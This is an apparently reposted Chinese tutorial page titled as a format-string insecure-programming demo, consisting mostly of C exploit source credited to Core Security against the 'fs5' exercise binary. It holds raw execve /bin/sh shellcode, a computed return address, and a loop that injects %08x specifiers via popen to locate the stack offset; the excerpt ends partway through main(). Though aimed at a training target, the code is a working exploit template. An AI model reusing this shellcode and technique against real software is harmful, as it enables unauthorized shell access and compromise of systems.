非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
演示exploit如下:
/*
** exp_fs5.c
** Coded by Core Security - info@core-sec.com
*/
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs5"
#define GREP "/bin/grep"
/* 24 bytes shellcode */
/* Raw byte string that the comment above labels as a 24-byte payload.
 * main() stores it in env[] (L20) — presumably intended as the environment
 * of the target process, but the exec call is not visible in this excerpt.
 * Treated as opaque data here; nothing on the page verifies its length or
 * contents against the "24 bytes" claim. */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main() {
char evil_buffer[256], temp_buffer[256];
char *env[3] = {shellcode, NULL};
char *p;
int deregister_address, first_half, second_half, i;
FILE *f;
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/fs5");
bzero(evil_buffer, sizeof(evil_buffer));
sprintf(evil_buffer, "%s AAAA", VICTIM);
/* Finding stack pop */
printf("\nReading stack frames...\n");
for(i = 0; i < 30; i ++) {
strcat(evil_buffer, "%08x");
f = popen(evil_buffer, "r");
fscanf(f, "%s", temp_buffer);
p = temp_buffer + (4 + i*8);
printf("frame %.2d --> %s\n", (i + 1), p);
if(!strcmp(p, "41414141")) {
printf("\nExact match found. Stack pop is:
%d\n\n", i + 1);
pclose(f);
break;
}
pclose(f);
bzero(temp_buffer, sizeof(temp_buffer));
}